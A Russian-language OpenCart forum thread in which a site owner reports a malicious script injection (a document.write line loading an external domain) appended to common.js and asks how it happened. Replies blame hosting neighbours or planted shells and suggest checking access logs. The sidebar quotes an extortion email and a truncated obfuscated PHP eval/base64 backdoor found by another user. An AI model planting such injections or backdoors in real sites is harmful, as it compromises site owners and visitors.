Jump to content

Recommended Posts

Старый сайт:

OcStore 1.5 

Тема стандартная (defaut) 

 

Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 

что то такое (картинка из инета)

javabad3.png

В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 

Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 

<?php foreach ($scripts as $script) { ?>
<script type="text/javascript" src="<?php echo $script; ?>"></script>
<?php } ?>

Понимаю, что данная херота может инклудится вот сюда из любого файла

Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js

В конце файла была приписка:

document.write('<script src="https://afrodizinlife.gq"><\x2fscript>');

Собственно вопрос:

Как такие вещи вообще происходят на opencart?

P.S. По поводу паролей можно не писать: 

1. 10 значные с спецсимволами + регистры

2. В браузере не храню

3. В FileZilla тоже не храню

Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 

Или какие то минимумы, что необходимо сделать всем и вся? 

Share this post


Link to post
Share on other sites

И да, если кто нибудь сможет мне пояснить, что делала у меня на сайте, буду благодарен

Share this post


Link to post
Share on other sites
5 минут назад, IIIBarsik сказал:

И да, если кто нибудь сможет мне пояснить, что эта херота делала у меня на сайте, буду благодарен

майнила что-то или в гугл страницу подменяла

подобные взломы в опенкарте обычно от соседей и украденных паролей

Share this post


Link to post
Share on other sites

Ой да ладно ) залез от соседа по хостингу и все) мало ли что 

Share this post


Link to post
Share on other sites

Модули с файлопомоек или взломанные ставили? Если нет. То рядом с вами или прям на вашем хостинг-аккаунте мог быть вордпресс, их ломают и всем кто рядом суют гадости.

Edited by niger

Share this post


Link to post
Share on other sites

посмотрите дату редактирования файла common.js

далее запросите у хостера access.log за эту дату

  • +1 1

Share this post


Link to post
Share on other sites
41 минуту назад, freelancer сказал:

посмотрите дату редактирования файла common.js

далее запросите у хостера access.log за эту дату

+1 Сняли с "языка" :)
ТС  - скорее всего вас взломали через "соседей", просто ботом внедрили в попавшиеся JS, свой код
Или какой то нерадивый "студент" (который выполнял у вас работы) вам подсунул шелл и внедрил потом майнер

 

Share this post


Link to post
Share on other sites
В 10.09.2018 в 18:13, markimax сказал:

+1 Сняли с "языка"
ТС  - скорее всего вас взломали через "соседей", просто ботом внедрили в попавшиеся JS, свой код
Или какой то нерадивый "студент" (который выполнял у вас работы) вам подсунул шелл и внедрил потом майнер

 

Можете подробнее объяснить суть взлома через "соседей"? 

"студент" отметается, ибо доступ только у 2 человек

Share this post


Link to post
Share on other sites
4 минуты назад, IIIBarsik сказал:

Можете подробнее объяснить суть взлома через "соседей"? 

"студент" отметается, ибо доступ только у 2 человек

рядом лежит вордпресс с плагинами бесплатно и без смс

либо у хостера виртуалхосты не изолированы и из скриптика можно получить доступ к соседним сайтам на других аккаунтах, таких много

Share this post


Link to post
Share on other sites
30 минут назад, spectre сказал:

рядом лежит вордпресс с плагинами бесплатно и без смс

либо у хостера виртуалхосты не изолированы и из скриптика можно получить доступ к соседним сайтам на других аккаунтах, таких много

Т.е. и в том и в другом случаях виртуалхосты не изолированны друг от друга, верно? Иначе я просто не понимаю по какой гейской магии сосед может влиять на меня

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Similar Content

    • By Prorab337
      400.00 руб
      Скачать/Купить дополнение


      Модуль оплаты «Наложенный платеж +» для OpenCart 1.5 - 2.X
      Данный модуль оплаты наложенным платежом является универсальным решением для любого способа доставки. Основные преимущества: отдельный калькулятор для каждого способа доставки, неограниченное число тарифов для каждого калькулятора, учет наложенного платежа в заказе. И это не все возможности модуля, функционал постоянно расширяется и улучшается.
      Возможности
      редактируемое, мультиязычное название для способа оплаты редактируемая, мультиязычная дополнительная информация редактируемая, мультиязычная инструкция по оплате выбор способов доставки, для которых будет доступен данный способ оплаты возможность задать нижнюю границу суммы заказа для данного способа оплаты возможность задать верхнюю границу суммы заказа для данного способа оплаты возможность задать сумму заказа при которой наложенный платеж будет бесплатен для клиента добавление/редактирование калькулятора стоимости наложенного платежа для всех доступных способов доставки: выбор валюты калькулятора добавление неограниченного количества тарифов возможность указать процентную ставку возможность указать фиксированный платеж возможность указать границу тарифа [*]включение/выключение учета в заказе
      [*]включение/выключение оценки стоимости наложенного платежа
      [*]и другие стандартные настройки модуля оплаты
      Демо
      OpenCart 2.X.X.X:
      Сайт
      Админка (логин/пароль: demo)
      OpenCart 1.5.X.X:
      Сайт
      Админка (логин/пароль: demo)
      Поддерживаемые языки
      украинский русский английский Совместимость
      OpenCart v. 1.5.Х.Х-2.X.X (а также сборки на базе OpenCart соответствующих версий) формы заказа: стандартная, Simple checkout & Registration Модуль НЕ ТРЕБУЕТ OCMOD и VQMOD.
      Весь функционал дополнения реализован в рамках стандартных модулей оплаты, по этому проблем с совместимостью не должно быть. Модуль тестировался и гарантированно работает на стандартном оформлении заказа OpenCart 2 и на последних версиях модуля Simple.
      Лицензия
      лицензия действует только на один домен и на все его поддомены, и тестовые сайты подробная информация о порядке получения лицензии доступна на вкладке «Поддержка» модуля активация лицензии происходит в течении нескольких часов после покупки Требования
      Ioncube Loader версии 5.0 и выше PHP версии 5.3 и выше Детальная инструкция по установке, настройке, обновлению и удалению модуля доступна в архиве в файле Instruction_ru.html
      Добавил Prorab337 Добавлено 27.02.2016 Категория Платежные системы Системные требования Ioncube Loader версии 5.0 и вышеPHP версии 5.3 и выше Метод активации Через официальный сайт дополнения Ioncube Loader Требуется OpenCart 3.0 ocStore 2.3 OpenCart.Pro, ocShop Обращение к серверу разработчика Да Старая цена 0  
    • By antares888
      На почту пришло такое письмо. Как защитить сайт?
      Мы взломали ваш сайт http://www.brandoptics.com.ua и извлекли ваши базы данных.
      Как это случилось?
      Наша команда обнаружила уязвимость на вашем сайте, которую мы смогли использовать. После обнаружения уязвимости мы смогли получить учетные данные вашей базы данных, извлечь всю базу данных и перенести информацию на оффшорный сервер.
      Что это значит?
      Мы будем систематически проходить через ряд шагов, наносящих полный ущерб вашей репутации. Сначала ваша база данных будет пропущена или продана самой высокой цене, которую они будут использовать с какими бы намерениями они ни были. Затем, если будут найдены электронные письма, они будут отправлены по электронной почте, что их информация была продана или утечка, и ваш сайт http://www.brandoptics.com.ua был виноват, таким образом, нанося ущерб вашей репутации и вызывая злых клиентов / партнеров с что бы ни делали злые клиенты / партнеры. Наконец, любые ссылки, которые вы проиндексировали в поисковых системах, будут деиндексироваться на основе техник блэкхата, которые мы использовали в прошлом для индексации наших целей.
      Как мне это остановить?
      Мы готовы воздержаться от разрушения репутации вашего сайта за небольшую плату. Текущая плата составляет 2000 долларов США в биткойнах (BTC).
      Отправьте биткойн по следующему адресу биткойна (скопируйте и вставьте, так как он чувствителен к регистру):
      1Md6imvB2neTF3s1kFiMG473k1XrBhxQhF
      Как только вы заплатите, мы автоматически получим уведомление о том, что это был ваш платеж. Обратите внимание, что вы должны произвести оплату в течение 5 дней после получения этого уведомления или утечки из базы данных, отправки электронных писем и начала индексации вашего сайта!
      Как я могу получить биткойны?
      Вы можете легко купить биткойны через несколько веб-сайтов или даже в автономном режиме через биткойн-банкомат. Мы предлагаем вам https://cex.io/ для покупки биткойнов.
      Что если я не буду платить?
      Если вы решите не платить, мы начнем атаку в указанную дату и будем поддерживать ее до тех пор, пока вы этого не сделаете. Никаких мер противодействия этому нет, вы в конечном итоге потратите больше денег, пытаясь найти решение. Мы полностью уничтожим вашу репутацию среди Google и ваших клиентов.
      Это не обман, не отвечайте на это письмо, не пытайтесь рассуждать или вести переговоры, мы не будем читать никаких ответов. Как только вы заплатите, мы прекратим то, что мы делали, и вы больше никогда не услышите от нас!
      Обратите внимание, что Биткойн является анонимным, и никто не узнает, что вы выполнили его.
       телефон: Германия
    • By serega-lomik
      Скачать/Купить дополнение


      Всплывающая корзина с заменой кнопки "Купить" для OcStore и OpenCart 1.5.*
      Модуль добавляет на сайт всплывающее окно с корзиной.
      Возможности модуля:
      Собственно само окно всплывающей корзины.
      Можно отключить само окно корзины при добавлении товара в корзину, оставив только изменение кнопки "Купить"
      Из админ части модуля вы сами можете настраивать:
      -- заголовок модуля
      -- текст ссылки "Продолжить покупки"
      -- текст кнопки перехода к оформлению заказа
      -- текст кнопки "Купить", когда товар добавлен в корзину
      -- текст кнопки "Купить", когда у товара есть опции и он добавлен в корзину
      Вид ссылки "Продолжить покупки" можно переключить на кнопку
      Кнопка "Перейти в корзину", управляется из админ-части модуля
      Колонка с наименованием производителя товара, показ колонки настраивается из админ-части модуля
      Выбор действия по клику на кнопке купить, когда данный товар уже присустствует в корзине:
      - 1 - просто открываем всплывающую корзину
      - 2 - добавляем еще выбранное кол-во товара в корзину и открываем всплывающую корзину
      Добавлена поддержка мультиязычности
      При добавлении товара в корзину заменяет надпись кнопки добавления в корзину на "Уже в корзине", при повторном клике по этой кнопке открывается окно с корзиной.
      В товарах, имеющих опции, надпись "Купить" заменяется на "Уже в корзине, купить ещё", что позволяет купить этот-же товар с другим набором опций.
      При нажатии на кнопку "Купить" данной кнопке присваивается дополнительный класс .in_cart, позволяющий, к примеру, с помощью css изменять фон или цвет кнопки, цвет шрифта и т.д.. При удалении данного товара из корзины, стиль кнопки возвращается к первоначальному виду.
      Изменение количества и удаление товара с пересчётом итоговой суммы непосредственно в окне корзины.
      Под наименованием товара в окне корзины отображает выбранные опции товара.
      Присутствует возможность отключения кнопки увеличения количества товара в корзине и предупреждение, что данного товара осталось всего столько-то штук при достижении в корзине максимального количества остатка товара на складе. Данную опцию можно отключить, для этого идём в админку-настройки магазина-вкладка "опции"-пункт "Заказ при нехватке на складе"
      При клике на блоке стандартной корзины открывает всплывающую корзину вместо стандартной.
      Работает на всех видах шаблонов
      В шаблонах, где кнопка "Купить" свёрстана по другому, всплывающая корзина также будет работать, но не будет меняться текст на кнопке.
      При удалении товара из корзины возвращает кнопку "Купить" к первоначальному виду.
      Добавлен блок "с этим товаром покупают"
      Товары показываются те, которые указаны в качестве сопутствующих, во вкладке связи
      Показ и заголовок данного блока настраивается в админке модуля
      Добавление товара в корзину из этого блока происходит без перезагрузки страницы и с обновлением самой корзины!
      Работает на всех модулях и страницах.
      Работает со всеми модулями фильтров, включая FilterPro.
      Работает на OpenCart версий 1.5.5 - 1.5.6.4, OcStore версий 1.5.3.1 - 1.5.5.1.2
      Проверена работа в браузерах: в Chrome 39.0.2171.95, FireFox 34.0.5, Opera 12.17, IE 11.0.9
      vQmod в модуле используется только для вывода самого модуля в футер шаблона.

      Работает на 99% шаблонов. Ну, кроме самых "безбашенных".
      Не уверены, что модуль будет работать на вашем сайте? Напишите мне личное сообщение, в котором укажите адрес сайта, я дам ответ.
      Для работы дополнения необходим vQmod. Но возможна работа и без него, всего 2 правки в двух файлах.
      Так же есть версия данного модуля для OpenCart 2.0, находится тут.

      Админ-часть модуля:

      После установки и активации обязательно заходим в админку в настройки модуля и даже если в настройках всё устраивает - жмём кнопку сохранить.
      Условия лицензии: одна покупка - один домен. Я прекрасно понимаю, что недобросовестных покупателей эти условия не остановят, но если вы являетесь таковым - забудьте о поддержке и обновлениях.
      Демо: http://1.live-drive.ru/desktops/
      Добавил serega-lomik Добавлено 28.12.2014 Категория Покупки, оформление заказа, корзина Системные требования Сайт разработчика Метод активации Ioncube Loader OpenCart ocStore OpenCart.Pro, ocShop Обращение к серверу разработчика Старая цена  
    • By Prorab337
      Данный модуль оплаты наложенным платежом является универсальным решением для любого способа доставки. Основные преимущества: отдельный калькулятор для каждого способа доставки, неограниченное число тарифов для каждого калькулятора, учет наложенного платежа в заказе. И это не все возможности модуля, функционал постоянно расширяется и улучшается.
      Возможности
      редактируемое, мультиязычное название для способа оплаты редактируемая, мультиязычная дополнительная информация редактируемая, мультиязычная инструкция по оплате выбор способов доставки, для которых будет доступен данный способ оплаты возможность задать нижнюю границу суммы заказа для данного способа оплаты возможность задать верхнюю границу суммы заказа для данного способа оплаты возможность задать сумму заказа при которой наложенный платеж будет бесплатен для клиента добавление/редактирование калькулятора стоимости наложенного платежа для всех доступных способов доставки: выбор валюты калькулятора добавление неограниченного количества тарифов возможность указать процентную ставку возможность указать фиксированный платеж возможность указать границу тарифа [*]включение/выключение учета в заказе
      [*]включение/выключение оценки стоимости наложенного платежа
      [*]и другие стандартные настройки модуля оплаты
      Демо
      OpenCart 2.X.X.X:
      Сайт
      Админка (логин/пароль: demo)
      OpenCart 1.5.X.X:
      Сайт
      Админка (логин/пароль: demo)
      Поддерживаемые языки
      украинский русский английский Совместимость
      OpenCart v. 1.5.Х.Х-2.X.X (а также сборки на базе OpenCart соответствующих версий) формы заказа: стандартная, Simple checkout & Registration Модуль НЕ ТРЕБУЕТ OCMOD и VQMOD.
      Весь функционал дополнения реализован в рамках стандартных модулей оплаты, по этому проблем с совместимостью не должно быть. Модуль тестировался и гарантированно работает на стандартном оформлении заказа OpenCart 2 и на последних версиях модуля Simple.
      Лицензия
      лицензия действует только на один домен и на все его поддомены, и тестовые сайты подробная информация о порядке получения лицензии доступна на вкладке «Поддержка» модуля активация лицензии происходит в течении нескольких часов после покупки Требования
      Ioncube Loader версии 5.0 и выше PHP версии 5.3 и выше Детальная инструкция по установке, настройке, обновлению и удалению модуля доступна в архиве в файле Instruction_ru.html
    • By Anton999
      Приветствую!
       
      Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.
       
      Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.
       
      Всем спасибо!
  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.